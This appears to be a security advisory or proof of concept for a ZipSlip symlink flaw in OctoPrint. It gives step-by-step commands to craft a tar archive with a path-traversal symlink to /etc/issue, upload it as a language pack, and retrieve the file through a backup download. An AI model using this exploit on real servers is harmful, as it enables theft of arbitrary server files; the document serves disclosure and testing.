Using the ZipSlip symlink variant, it is possible to steal any file from the OctoPrint remote server via an upload of a maliciously crafted archive as a language pack and download the stolen files within a backup archive.
To set up the Octoprint web application, we used the dockerized version
sudo docker volume create octoprint
sudo docker run -d -v octoprint:/octoprint -p 80:80 --name octoprint octoprint/octoprint
Generate a maliciously crafted archive as follow:
# unzip the language pack for italian
unzip language-pack-it.zip
cd ./it/LC_MESSAGES/
# generate a symlink as shown below, notice the difference between ../ and ./
ln -s ././../../../../../../../../../etc/issue issue.y3
# add it to a maliciously crafted TAR archive
tar -cvf it_crafted.tar ./it/
After initial configuration with default parameters, login and head to OctoPrint Settings > Octoprint Appearance > Language Packs. Click onManage > Upload additional Language Packs. Upload the it_crafted.tar
archive as a language pack.
Now, head to Octoprint settings > Backup & Restore. Click onCreate backup now. Download the new backup archive. Read the content of the file located within the backup archive at /basedir/translations/it/LC_MESSAGES/issue.y3
. You will get the server-side issue file.